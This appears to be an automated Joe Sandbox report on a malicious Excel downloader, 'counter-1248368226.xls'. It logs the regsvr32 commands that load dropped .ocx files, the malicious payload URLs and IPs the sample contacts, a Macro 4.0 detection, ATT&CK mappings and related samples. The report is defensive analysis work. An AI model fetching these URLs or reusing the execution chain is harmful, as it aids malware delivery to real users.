      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocxJump to behavior
      Source: EXCEL.EXE, 00000000.00000002.772332820.00000000050B0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.504834488.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE6A6.tmpJump to behavior
      Source: classification engineClassification label: mal80.expl.winXLS@7/4@3/3
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: C:\Windows\System32\regsvr32.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: FFC2.tmp.0.drInitial sample: OLE indicators vbamacros = False
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 1172Thread sleep count: 111 > 30Jump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 2128Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\regsvr32.exe TID: 2728Thread sleep time: -60000s >= -30000sJump to behavior
      Source: EXCEL.EXE, 00000000.00000003.567492651.00000000080CA000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567317162.0000000007FFD000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567309413.000000000594F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567301976.0000000005A56000.00000004.00000001.sdmpBinary or memory string: vNWziajHgfS7tFDWOKyqrQrqAAAAAAAAAAAABkYAAAAAAAAAAAAAAHQWW/RLD1fagfOsuPn2DzAD

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Yara detected hidden Macro 4.0 in ExcelShow sources
      Source: Yara matchFile source: counter-1248368226.xls, type: SAMPLE
      Source: Yara matchFile source: C:\Users\user\Desktop\counter-1248368226.xls, type: DROPPED
      Source: EXCEL.EXE, 00000000.00000002.770115038.00000000007F0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.770115038.00000000007F0000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: EXCEL.EXE, 00000000.00000002.770115038.00000000007F0000.00000002.00020000.sdmpBinary or memory string: Program Manager<

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsScripting1Path InterceptionProcess Injection2Disable or Modify Tools1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsSystem Information Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      counter-1248368226.xls41%ReversingLabsDocument-Excel.Downloader.EncDoc

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      greenflag.esp.br1%VirustotalBrowse
      playsis.com.br1%VirustotalBrowse
      noithat117.vn3%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://greenflag.esp.br/s0%Avira URL Cloudsafe
      https://playsis.com.br/Y~T100%Avira URL Cloudmalware
      http://ocsp.entrust.net030%URL Reputationsafe
      https://playsis.com.br/qJSi100%Avira URL Cloudmalware
      https://playsis.com0%Avira URL Cloudsafe
      https://greenflag.esp.br/0%Avira URL Cloudsafe
      https://playsis.com.br/100%Avira URL Cloudmalware
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      https://playsis.com.br/qJSL1BN5V/tiynh.html117.vn/TSh7GBeIR/tiynh.htmlink100%Avira URL Cloudmalware
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      https://playsis.com.br/qJSL117.100%Avira URL Cloudmalware
      https://playsis.cre0%Avira URL Cloudsafe
      https://noithat117.vn/TSh7GBeIR/tiynh.html0%Avira URL Cloudsafe
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      https://playsis.com.br/qJSL1BN5V/tiynh.html5100%Avira URL Cloudmalware
      https://greenflag.esp.br/yuINdRbM/tiynh.html0%Avira URL Cloudsafe
      https://playsis.com.br/qJSL1B.b100%Avira URL Cloudmalware
      https://noithat117.vn/0%Avira URL Cloudsafe
      https://playsis.com.br/qhtt100%Avira URL Cloudmalware
      http://www.%s.comPA0%URL Reputationsafe
      https://playsis.com.boi0%Avira URL Cloudsafe
      https://playsis.com.br/qJSL1BN5V/tiynh.html100%Avira URL Cloudmalware
      http://ocsp.entrust.net0D0%URL Reputationsafe
      https://playsis.com.br/qJSL1BNt100%Avira URL Cloudmalware
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      greenflag.esp.br
      108.179.192.98
      truefalseunknown
      playsis.com.br
      162.241.2.78
      truefalseunknown
      noithat117.vn
      103.28.36.171
      truefalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://noithat117.vn/TSh7GBeIR/tiynh.htmlfalse
      • Avira URL Cloud: safe
      unknown
      https://greenflag.esp.br/yuINdRbM/tiynh.htmlfalse
      • Avira URL Cloud: safe
      unknown
      https://playsis.com.br/qJSL1BN5V/tiynh.htmltrue
      • Avira URL Cloud: malware
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpfalse
        high
        http://investor.msn.comEXCEL.EXE, 00000000.00000002.772332820.00000000050B0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.504834488.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtEXCEL.EXE, 00000000.00000002.772332820.00000000050B0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.504834488.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpfalse
            high
            https://greenflag.esp.br/sEXCEL.EXE, 00000000.00000003.564287009.0000000008058000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775190147.0000000008058000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567396088.0000000008058000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://playsis.com.br/Y~TEXCEL.EXE, 00000000.00000003.645341945.0000000005925000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.773729987.0000000005929000.00000004.00000001.sdmptrue
            • Avira URL Cloud: malware
            unknown
            http://crl.entrust.net/server1.crl0EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpfalse
              high
              http://ocsp.entrust.net03EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              https://playsis.com.br/qJSiEXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmptrue
              • Avira URL Cloud: malware
              unknown
              https://playsis.comEXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://greenflag.esp.br/EXCEL.EXE, 00000000.00000003.564287009.0000000008058000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775190147.0000000008058000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567396088.0000000008058000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://playsis.com.br/EXCEL.EXE, 00000000.00000003.645341945.0000000005925000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.773729987.0000000005929000.00000004.00000001.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.diginotar.nl/cps/pkioverheid0EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              https://playsis.com.br/qJSL1BN5V/tiynh.html117.vn/TSh7GBeIR/tiynh.htmlinkEXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmptrue
              • Avira URL Cloud: malware
              unknown
              http://windowsmedia.com/redir/services.asp?WMPFriendly=trueEXCEL.EXE, 00000000.00000002.772738904.0000000005297000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.505095885.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443759744.0000000004AD7000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oeEXCEL.EXE, 00000000.00000002.772332820.00000000050B0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.504834488.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpfalse
                high
                https://playsis.com.br/qJSL117.EXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmptrue
                • Avira URL Cloud: malware
                unknown
                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckEXCEL.EXE, 00000000.00000002.772738904.0000000005297000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.505095885.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443759744.0000000004AD7000.00000002.00020000.sdmpfalse
                  high
                  https://playsis.creEXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.icra.org/vocabulary/.EXCEL.EXE, 00000000.00000002.772738904.0000000005297000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.505095885.0000000004C07000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443759744.0000000004AD7000.00000002.00020000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.504300756.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443258094.00000000039F0000.00000002.00020000.sdmpfalse
                    high
                    https://playsis.com.br/qJSL1BN5V/tiynh.html5EXCEL.EXE, 00000000.00000002.775298958.0000000008076000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564300874.0000000008076000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567427727.0000000008076000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://playsis.com.br/qJSL1B.bEXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: malware
                    unknown
                    https://noithat117.vn/EXCEL.EXE, 00000000.00000003.645341945.0000000005925000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.773729987.0000000005929000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://investor.msn.com/EXCEL.EXE, 00000000.00000002.772332820.00000000050B0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.504834488.0000000004A20000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443606080.00000000048F0000.00000002.00020000.sdmpfalse
                      high
                      https://playsis.com.br/qhttEXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      http://www.%s.comPAregsvr32.exe, 00000003.00000002.504300756.0000000003AB0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.443258094.00000000039F0000.00000002.00020000.sdmpfalse
                      • URL Reputation: safe
                      low
                      https://playsis.com.boiEXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.entrust.net0DEXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://playsis.com.br/qJSL1BNtEXCEL.EXE, 00000000.00000002.773538533.00000000057A0000.00000004.00000001.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://secure.comodo.com/CPS0EXCEL.EXE, 00000000.00000002.775151480.0000000008043000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564294581.0000000008068000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567383807.0000000008043000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564281653.0000000008043000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.567411737.0000000008068000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775255583.0000000008068000.00000004.00000001.sdmpfalse
                        high
                        http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.503985491.0000000001D50000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.441043592.0000000001CC0000.00000002.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://crl.entrust.net/2048ca.crl0EXCEL.EXE, 00000000.00000003.567441714.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.775331264.0000000008085000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.564306959.0000000008085000.00000004.00000001.sdmpfalse
                          high

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          162.241.2.78
                          playsis.com.brUnited States
                          26337OIS1USfalse
                          108.179.192.98
                          greenflag.esp.brUnited States
                          46606UNIFIEDLAYER-AS-1USfalse
                          103.28.36.171
                          noithat117.vnViet Nam
                          131353NHANHOA-AS-VNNhanHoaSoftwarecompanyVNfalse

                          General Information

                          Joe Sandbox Version:34.0.0 Boulder Opal
                          Analysis ID:532597
                          Start date:02.12.2021
                          Start time:14:34:33
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 7m 17s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:counter-1248368226.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of analysed new started processes analysed:8
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal80.expl.winXLS@7/4@3/3
                          EGA Information:Failed
                          HDC Information:Failed
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, svchost.exe
                          • Execution Graph export aborted for target EXCEL.EXE, PID 2664 because there are no executed function

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          14:35:30API Interceptor338x Sleep call for process: regsvr32.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          162.241.2.78#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exeGet hashmaliciousBrowse
                          • www.entreiparaodigital.com/jdkn/?1b0=I3SbQcfk5mKncCcQGw+gNueSmbNJxTZBbu+zAfDoz/ZWf2NQtBtv1zSdSMyJHdn3WlwE&mJBHHf=B0DPf0S8Ibot
                          108.179.192.98counter-1248368226.xlsGet hashmaliciousBrowse
                            counter-119221000.xlsGet hashmaliciousBrowse
                              counter-119221000.xlsGet hashmaliciousBrowse
                                tr.xlsGet hashmaliciousBrowse
                                  tr.xlsGet hashmaliciousBrowse
                                    counter-1389180325.xlsGet hashmaliciousBrowse
                                      counter-1389180325.xlsGet hashmaliciousBrowse
                                        103.28.36.171211094.exeGet hashmaliciousBrowse
                                        • www.nhadat9chu.com/iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        noithat117.vncounter-1248368226.xlsGet hashmaliciousBrowse
                                        • 103.28.36.171
                                        counter-119221000.xlsGet hashmaliciousBrowse
                                        • 103.28.36.171
                                        counter-119221000.xlsGet hashmaliciousBrowse
                                        • 103.28.36.171
                                        tr.xlsGet hashmaliciousBrowse
                                        • 103.28.36.171
                                        tr.xlsGet hashmaliciousBrowse
                                        • 103.28.36.171
                                        counter-1389180325.xlsGet hashmaliciousBrowse
                                        • 103.28.36.171
                                        counter-1389180325.xlsGet hashmaliciousBrowse
                                        • 103.28.36.171
                                        playsis.com.brcounter-1248368226.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        counter-119221000.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        counter-119221000.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        tr.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        tr.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        counter-1389180325.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        counter-1389180325.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        greenflag.esp.brcounter-119221000.xlsGet hashmaliciousBrowse
                                        • 108.179.192.98
                                        counter-119221000.xlsGet hashmaliciousBrowse
                                        • 108.179.192.98
                                        tr.xlsGet hashmaliciousBrowse
                                        • 108.179.192.98
                                        tr.xlsGet hashmaliciousBrowse
                                        • 108.179.192.98
                                        counter-1389180325.xlsGet hashmaliciousBrowse
                                        • 108.179.192.98
                                        counter-1389180325.xlsGet hashmaliciousBrowse
                                        • 108.179.192.98

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        OIS1UScounter-1248368226.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        a2SyRyTizn.exeGet hashmaliciousBrowse
                                        • 162.241.203.110
                                        TSmtIL1EeJ.exeGet hashmaliciousBrowse
                                        • 162.241.203.110
                                        counter-119221000.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        counter-119221000.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        tr.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        tr.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        counter-1389180325.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        counter-1389180325.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        PURCHASE ORDER HECTRO.xlsxGet hashmaliciousBrowse
                                        • 162.241.85.81
                                        chase.xlsGet hashmaliciousBrowse
                                        • 162.241.2.167
                                        chase.xlsGet hashmaliciousBrowse
                                        • 162.241.2.167
                                        private-1915056036.xlsGet hashmaliciousBrowse
                                        • 162.241.2.167
                                        private-1915056036.xlsGet hashmaliciousBrowse
                                        • 162.241.2.167
                                        private-1910485378.xlsGet hashmaliciousBrowse
                                        • 162.241.2.167
                                        private-1910485378.xlsGet hashmaliciousBrowse
                                        • 162.241.2.167
                                        Amended Order.xlsxGet hashmaliciousBrowse
                                        • 162.241.2.151
                                        aLTbT3KJXg.exeGet hashmaliciousBrowse
                                        • 192.185.147.203
                                        qWeAgF7WNO.exeGet hashmaliciousBrowse
                                        • 192.185.147.203
                                        Page_1of3#Ud83d#Udce0.htmlGet hashmaliciousBrowse
                                        • 162.241.70.204
                                        UNIFIEDLAYER-AS-1UScounter-1248368226.xlsGet hashmaliciousBrowse
                                        • 108.179.192.98
                                        CU-6431 report.xlsmGet hashmaliciousBrowse
                                        • 162.240.9.126
                                        CU-6431 report.xlsmGet hashmaliciousBrowse
                                        • 162.240.9.126
                                        DkX9HVJTmi.exeGet hashmaliciousBrowse
                                        • 108.167.135.122
                                        Shipping report -17420.xlsxGet hashmaliciousBrowse
                                        • 162.241.169.32
                                        SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                        • 162.240.9.126
                                        SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                        • 162.240.9.126
                                        INVOICE.exeGet hashmaliciousBrowse
                                        • 162.214.80.6
                                        img20048901738_Pago.pdf.exeGet hashmaliciousBrowse
                                        • 192.185.115.3
                                        PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                        • 162.241.126.156
                                        PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                                        • 162.241.126.156
                                        New order documents. pdf..............exeGet hashmaliciousBrowse
                                        • 108.179.232.76
                                        part-1500645108.xlsbGet hashmaliciousBrowse
                                        • 162.241.62.201
                                        img20048901740_Pago.pdf.exeGet hashmaliciousBrowse
                                        • 192.185.115.3
                                        part-1500645108.xlsbGet hashmaliciousBrowse
                                        • 162.241.62.201
                                        shedy.exeGet hashmaliciousBrowse
                                        • 162.241.218.172
                                        product list.xlsxGet hashmaliciousBrowse
                                        • 162.241.218.178
                                        accounts...exeGet hashmaliciousBrowse
                                        • 192.185.164.148
                                        New product of Aluminium Profile.exeGet hashmaliciousBrowse
                                        • 192.185.84.191
                                        BL. AWSMUNDAR3606-21.exeGet hashmaliciousBrowse
                                        • 162.241.148.56

                                        JA3 Fingerprints

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        7dcce5b76c8b17472d024758970a406bcounter-1248368226.xlsGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        CU-6431 report.xlsmGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        DHL Original shipping Document_pdf.ppamGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        New Price List.ppamGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        SCAN_7295943480515097.xlsmGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        Hotel Guest List.ppamGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        IRQ2107798.ppamGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        AWB.ppamGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        FILE_915494026923219.xlsmGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
                                        IRQ2107797.ppamGet hashmaliciousBrowse
                                        • 162.241.2.78
                                        • 108.179.192.98
                                        • 103.28.36.171
